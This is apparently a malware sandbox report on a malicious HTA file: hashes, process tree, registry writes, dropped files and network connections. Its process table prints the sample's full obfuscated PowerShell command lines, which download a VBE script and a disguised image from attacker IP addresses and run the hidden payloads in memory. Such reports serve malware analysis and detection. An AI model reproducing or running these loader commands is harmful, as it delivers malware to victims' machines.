| File name: | botharefgoodformajorworktogivebestthignstodobetter.hta |
| Full analysis: | https://app.any.run/tasks/3c6292d2-7105-4fe5-a8d2-85851e997757 |
| Verdict: | Malicious activity |
| Analysis date: | May 19, 2025, 17:44:05 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/javascript |
| File info: | JavaScript source, ASCII text, with very long lines (29407), with no line terminators |
| MD5: | FAC0940EB10EF7DD57EA7348D1176D02 |
| SHA1: | 5F5F6A707F54B9060B1CA82F3C1233D52751F724 |
| SHA256: | 7669571AB106028C768CA287ED8D40F62F74A8620A1814E00906BF5019648B24 |
| SSDEEP: | 96:/1I4kBWg4v+Wnkn9gLImHQhHHAHjEQD4R74cAkqe5WOwC4s:/1cBWWWnkn9sImHknejE9Akqe5WOwC |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1072 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nkcfha5o.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 1300 | pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1532 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$mavis = 'JABvAHYAZQByAHQAaQBsAHQAIAA9ACAAJwB0AHgAdAAuAHIAZQB0AHQAZQBiAG8AZABvAHQAcwBuAGcAaQBoAHQAdABzAGUAYgBlAHYAaQBnAG8AdABrAHIAbwB3AHIAbwBqAGEAbQByAG8AZgBkAG8AbwBnAGYAZQByAGEAaAB0AG8AYgAvADAANwA5AC8ANAA2ADEALgA3ADQALgAzADcAMQAuADcAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAYwBlAG4AdAByAGkAcwBjAGkAZgBvAHIAbQBlAHMAIAA9ACAAJABvAHYAZQByAHQAaQBsAHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAHQAcgBlAGEAYwBoAGUAcgBzACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgAxADMANwAuADIAMgAuADEAMAAxAC8AeABhAG0AcABwAC8AYwB2AC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJAB0AGkAbQBlAHoAbwBuAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABpAG0AZQB6AG8AbgBlAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGQAZQBtAG8AbgBpAHMAZQBkACAAPQAgACQAdABpAG0AZQB6AG8AbgBlAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHQAcgBlAGEAYwBoAGUAcgBzACkAOwAkAGQAbwBzAGEAZwBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABlAG0AbwBuAGkAcwBlAGQAKQA7ACQAYQBtAGUAbgBkAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABhAGMAbgBlAHMAdABpAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcAByAGUAYwBsAGEAcgBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAG0AZQBuAGQAZQByAHMAKQA7ACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAGMAbgBlAHMAdABpAHMAKQA7ACQAcAByAGUAYwBsAGEAcgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAALQBnAHQAIAAkAHAAcgBlAGMAbABhAHIAZQA7ACQAcAByAGUAYwBsAGEAcgBlACAAKwA9ACAAJABhAG0AZQBuAGQAZQByAHMALgBMAGUAbgBnAHQAaAA7ACQAbgBvAG4AZQBtAGUAdABpAGMAIAA9ACAAJAB0AHIAYQBuAHEAdQBpAGwAaQBzAGUAIAAtACAAJABwAHIAZQBjAGwAYQByAGUAOwAkAGYAZQBlAGQAdABoAHIAbwB1AGcAaAAgAD0AIAAkAGQAbwBzAGEAZwBlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHAAcgBlAGMAbABhAHIAZQAsACAAJABuAG8AbgBlAG0AZQB0AGkAYwApADsAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGUAZQBkAHQAaAByAG8AdQBnAGgAKQA7ACQAYwBoAGEAcABlAHIAbwBuAG4AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQApADsAJABzAGgAbwBwAHcAbwByAG4AIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABjAGUAbgB0AHIAaQBzAGMAaQBmAG8AcgBtAGUAcwAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwB1AG4AYwBsAGkAbQBiAGUAZAAnACwAJwB2AGIAcwAnACwAJwAnACwAJwAnACwAJwBTAGEAaQBvAG4AagBpACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$palmad = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($mavis));Invoke-Expression $palmad;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1676 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2504 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3096 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3888 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5376 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDA54.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 5960 | "C:\WINDOWS\system32\cmd.exe" "/C pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))" | C:\Windows\SysWOW64\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6576 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (7000) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7000) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7000) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (1300) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (1300) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (1300) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (1300) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids |
| Operation: | write | Name: | VBEFile |
Value: | |||
| (PID) Process: | (1532) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (1532) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (1532) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_plb444vq.flm.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1072 | csc.exe | C:\Users\admin\AppData\Local\Temp\nkcfha5o.out | text | |
MD5:00C08D692B63F41922547A7783D92397 | SHA256:75C7F70DEBCC8A320A4767FF0AD5E4D018BE14826F043BF1122AFF97FE611360 | |||
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lefbshjd.rj3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:3252B37D83421C22EF5C9D59215D4B48 | SHA256:B3F0000B0683F43E8435A84D61B17F7258104DE45E87CBDB2025D9C6135600B8 | |||
| 5376 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESDA54.tmp | binary | |
MD5:15505B1C8CDA2C36298F50E00CEECB4D | SHA256:23FF466BF146093D12C27FAF605407154E0A68ECEBA71EE21689107517E7B98D | |||
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\botharefgoodformajorworktogivebestthignstodobetter[1].vbe | text | |
MD5:40F1A3A2E6B8667536485C07BECC73E9 | SHA256:D481255082C01A231D390EAD7547C0E6B2B342DE599BE3173B2EC7483DB6A4AA | |||
| 1532 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8B8A832FCE2174C8FEE26B70F2483FBB | SHA256:0FBA3A37EF443507F533A7C3F31C0B5826EA416B95FDE43479E02D4E0C29400B | |||
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c1arheht.3jw.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pulkxdb4.eiv.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1072 | csc.exe | C:\Users\admin\AppData\Local\Temp\nkcfha5o.dll | executable | |
MD5:01838917EB83452F6BBE5F25D685CDD6 | SHA256:CC05A11028CE57655BAAF832E75C88E9D8CCF97D6F408DA764C1410DE7878320 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
4428 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4428 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1300 | powershell.exe | GET | 200 | 107.173.47.164:80 | http://107.173.47.164/970/botharefgoodformajorworktogivebestthignstodobetter.vbe | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.66:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1300 | powershell.exe | 107.173.47.164:80 | — | AS-COLOCROSSING | US | unknown |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |